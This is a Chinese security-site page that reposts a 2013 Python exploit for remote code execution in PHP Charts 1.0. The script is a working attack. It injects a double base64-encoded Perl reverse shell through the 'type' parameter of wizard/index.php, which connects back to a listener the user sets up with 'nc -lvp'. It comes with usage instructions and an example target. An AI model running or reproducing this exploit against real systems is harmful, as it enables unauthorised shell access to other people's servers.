首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP Charts 1.0 Remote Code Execution
来源:insecurety.net 作者:infodox 发布时间:2013-06-27  
#!/usr/bin/python
# Original Advisory came from:
# http://packetstormsecurity.com/files/119582/PHP-Charts-1.0-Code-Execution.html
# infodox - insecurety.net
import requests
import random
import threading
import sys

def genpayload(host, port):
    """ Perl Reverse Shell Generator """
    load = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';""" %(host, port)
    encoded = load.encode('base64')
    encoded = encoded.strip()
    encoded = encoded.replace('\n', '')
    encoded = encoded.encode('base64')
    encoded = encoded.strip()
    encoded = encoded.replace('\n', '') # double encoding , yes
    payload = "system(base64_decode(base64_decode('%s')))" %(encoded)
    return payload


def hack(pwn):
    requests.get(pwn)

def main():
    haxurl = "http://" + target + path + "wizard/index.php?type=';INSERTCODE;//"
    payload = genpayload(host, port)
    pwn = haxurl.replace("INSERTCODE", payload)
    print "[+] Preparing for hax"
    print "[!] Please run nc -lvp %s on your listener" %(port)
    raw_input("Press Enter to Fire...") # debugging
    print "[*] Sending malicious request..."
    threading.Thread(target=hack, args=(pwn,)).start() # ph33r l33t thr34d1ng
    print "[?] g0tr00t?"
    sys.exit(0)

def randomQuote():
    quotes =\
    ['Now with advice from Sabu!', 'Now with LOIC Support', 'Now with auto-DDoS',
    'Now with auto-brag!', 'Now with advice from Kevin Mitnick', 'Now with silly quotes!',
    'Comes with free forkbombs!', 'Now with a free copy of Havij', 'Are you stoned, or just stupid?']
    randomQuote = random.choice(quotes)
    return randomQuote

def banner():
    print "PHP-Charts v1.0 Remote Code Execution Exploit."
    randomquote = randomQuote()
    print randomquote

if len(sys.argv) != 5:
    banner()
    print "Usage: %s <target host> <path to wizard> <listener host> <listener port>" %(sys.argv[0])
    print "Example: %s hackme.com /wp/chart/chart/ hacke.rs 1337" %(sys.argv[0])
    sys.exit(1)
else:
    banner()
    target = sys.argv[1]
    path = sys.argv[2]
    host = sys.argv[3]
    port = sys.argv[4]
    main()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD 9 Address Space Manipu
·PCMan's FTP Server 2.0 Directo
·Novell Client 2 SP3 nicm.sys L
·PCMan's FTP Server 2.0 Denial
·ZPanel zsudo Local Privilege E
·Java Applet ProviderSkeleton I
·Baby FTP Server 1.24 - Denial
·PCMan's FTP Server 2.0.7 - Buf
·Sprite Software Android Race C
·PCMan's FTP Server 2.0 - Remot
·Telnet-Ftp Service Server 1.0
·Carberp Web Panel C2 Backdoor
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved